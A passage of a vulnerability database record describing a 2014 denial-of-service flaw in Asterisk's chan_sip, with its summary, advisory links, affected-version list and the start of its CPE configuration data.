  "published": "2018-11-14T20:29:00.587",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2018-010.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28127"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2018-010.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28127"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-04-18 22:14

Modified

2024-11-21 02:06

Severity ?

Summary

channels/chan_sip.c in Asterisk Open Source 1.8.x before 1.8.26.1, 11.8.x before 11.8.1, and 12.1.x before 12.1.1, and Certified Asterisk 1.8.15 before 1.8.15-cert5 and 11.6 before 11.6-cert2, when chan_sip has a certain configuration, allows remote authenticated users to cause a denial of service (channel and file descriptor consumption) via an INVITE request with a (1) Session-Expires or (2) Min-SE header with a malformed or invalid value.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-002-1.8.diff	Patch
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-002.html	Patch, Vendor Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html
cve@mitre.org	http://www.mandriva.com/security/advisories?name=MDVSA-2014:078
cve@mitre.org	http://www.securityfocus.com/bid/66094
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-23373
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-002-1.8.diff	Patch
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-002.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html
af854a3a-2127-422b-91ae-364da2661108	http://www.mandriva.com/security/advisories?name=MDVSA-2014:078
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/66094
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-23373

Impacted products

Vendor	Product	Version
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.0.0
digium	certified_asterisk	1.8.1.0
digium	certified_asterisk	1.8.1.0
digium	certified_asterisk	1.8.2.0
digium	certified_asterisk	1.8.2.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.3.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.4.0
digium	certified_asterisk	1.8.5.0
digium	certified_asterisk	1.8.5.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.6.0
digium	certified_asterisk	1.8.7.0
digium	certified_asterisk	1.8.7.0
digium	certified_asterisk	1.8.7.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.8.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.9.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.10.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.11.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.12.0
digium	certified_asterisk	1.8.13.0
digium	certified_asterisk	1.8.13.0
digium	certified_asterisk	1.8.13.0
digium	certified_asterisk	1.8.14.0
digium	certified_asterisk	1.8.14.0
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	1.8.15
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	certified_asterisk	11.6.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.1
digium	asterisk	1.8.8.2
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.1
digium	asterisk	1.8.9.2
digium	asterisk	1.8.9.3
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.1
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.1
digium	asterisk	1.8.11.1
digium	asterisk	1.8.11.1
digium	asterisk	1.8.12
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.1
digium	asterisk	1.8.12.2
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.1
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.1
digium	asterisk	1.8.14.1
digium	asterisk	1.8.14.1
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.1
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.1
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.1
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.1
digium	asterisk	1.8.20.1
digium	asterisk	1.8.20.2
digium	asterisk	1.8.20.2
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.1
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.1
digium	asterisk	1.8.25.0
digium	asterisk	1.8.25.0
digium	asterisk	1.8.25.0
digium	asterisk	1.8.26.0
digium	asterisk	1.8.26.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
fedoraproject	fedora	19
fedoraproject	fedora	20

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "93F2B062-09B4-44F1-87E4-6104B757B557",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "F2877B09-B0B9-4AD4-906A-D40E25DDC4BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "11AAE0EA-D7EB-4341-A412-FBCDC99565A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "37F93124-25D9-44ED-B4AB-1B3552FCAB09",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "E4CB22F6-9F63-427C-B2D2-7ABB9B4F7694",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "758AB27B-7C40-41ED-9FC3-BE3D682EE48A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "07D3186A-CD6F-432A-8653-4CFBA37B9864",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "746FB2E6-EF66-4EF3-946C-111FB7728EBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "91D933DB-06F7-45A4-A517-BFAEC82DDB7D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "3AAB500F-8F0D-4534-B659-C495D1799913",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.0.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "5F5C5156-CC72-4AB5-A927-E874199EBD8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.1.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "AB912D4D-6BA4-4AEF-BBFD-EABFED240015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "68C78C16-3807-4272-9B46-9D9AF5150879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.2.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "02E13D3A-B37B-4215-82E0-3FCE5E35B00A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "BE0F93D1-7602-47AC-9ACE-AA850D7DFD23",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "956BCED3-1818-4673-A0F4-E7F03F366D99",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0B58ACCC-0255-46B1-8517-EDCD85AA0F35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A921B590-57C2-4E0A-B28B-D0E48F5E1B58",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.3.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "70F0AE7B-9E53-4E3B-AA9E-EAF7C4C31E1D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "5DE6F187-7236-4622-BD62-1E5F0742B41B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F70DDB6D-BE16-4375-87AE-E5E2B5862D17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6910E07C-3ACA-414F-B468-13E4BF9BE938",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "837A07D7-C2FD-4077-A0AD-AF2147E04B84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.5.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "B2A99209-E8C5-44E6-A8DA-7FC07FBA6D87",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "18985B4A-4C54-4EC6-9274-15E7DCFEC94D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "48AE70AD-85BE-44DE-BC75-1690C27821B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "804F861A-81E1-45C5-A7D3-0E73770AC155",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0AE503BD-F9BD-4396-B27D-184AE06F594D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9CD9A213-27F7-410E-97B1-E7405B4FCECE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.7.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "10FFDE4F-0B30-43C3-9475-80259D5E9055",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5F30E2AB-B354-4583-9D76-9DF1727407A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DBDFE57E-EEBF-4722-B6D0-147F72018DE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "902A2600-49A7-4013-A621-9EE94F1E8435",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7021D54A-D443-492A-AE8C-62F2B85A1F37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B003CB5A-A95A-481F-B762-79C476829D81",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "84C8BB88-FBE3-4C82-9D53-E34AA7B6A73E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "F8037EB0-42FA-45BA-9E8E-D279432EC4CD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "E374559C-E550-4BB9-9682-9C4535EAE9A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "FFFB7E8B-C963-4ACB-AE37-9E4938A5462E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF83EAD3-3CC1-4C1B-AAB8-0FE03BB67EC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E3F75AF0-A4E0-425E-B707-ED1F58C9CC83",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "745EC4D8-5E19-48C8-8609-11A74DC18266",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F1871DC4-AA58-4C04-9D6A-4FF383C56405",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8560DBD-A70E-4033-AE2E-96DA373AB425",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E08ECE50-3A53-45C1-8BEA-8B9E024E22F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "59C2E58B-EEB3-4E8D-940C-2DF846923B19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D40F2ADC-6F79-410F-9063-1354C15F0D8E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "69E55195-84CC-46DB-9E49-DEB864DF0659",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7F58B52D-9510-465F-8BFB-6896B4D36F5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "59E72AD4-90BE-4C3B-B457-31FF193712FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "81EB266E-40BC-45EA-8EDB-4766011C460B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "E23FCBC3-30EF-47BC-AEFE-073E84B6DBA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5AB33EDF-29D7-4092-91FE-505B39D3E57B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4F698874-028E-410B-90FE-FDD441F55C32",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "081DA344-7266-4D67-8B92-830F43B42CC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.13.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "01851B4A-F7CB-4263-B06C-92D39A693530",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BB95638-D09F-4F02-9076-49BE93F2A407",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6E2DD3AF-EF01-4A1A-AF9A-98575E36D088",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "163E8F93-432A-4F68-B309-7A38AE1A30FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F53C384F-75DD-4A29-8907-BA95F08B1465",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:-:*:*:*:*:*:*",
              "matchCriteriaId": "6BB940E4-E612-4B27-9188-E794665191B8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "2365F1EE-16A4-4293-B80E-A51CD6A2F112",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6952FFDE-92D0-4A75-AABB-113E6FAF5A31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5735354A-CF57-4A9A-9607-169CE50E0655",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "38E0B2C4-55EA-4712-8E75-24A5718F9FD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F087C546-FBCA-4D0D-A023-8F9384CD160C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "832F5503-6354-4E39-B927-3BA9606A372D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "9E23AF8A-63B2-4597-8E78-A4672B0C44B3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "781AC882-80DD-4176-8E4F-220343B15F68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "770CCEEA-B121-454B-BD36-3FC1B262998A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "CCDDF5C2-9B45-4811-90F6-984EF4B220CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "56849E34-B192-46A8-A517-C7C184A901B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4610D544-156F-4E9A-BC46-9E0FF8D5D641",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
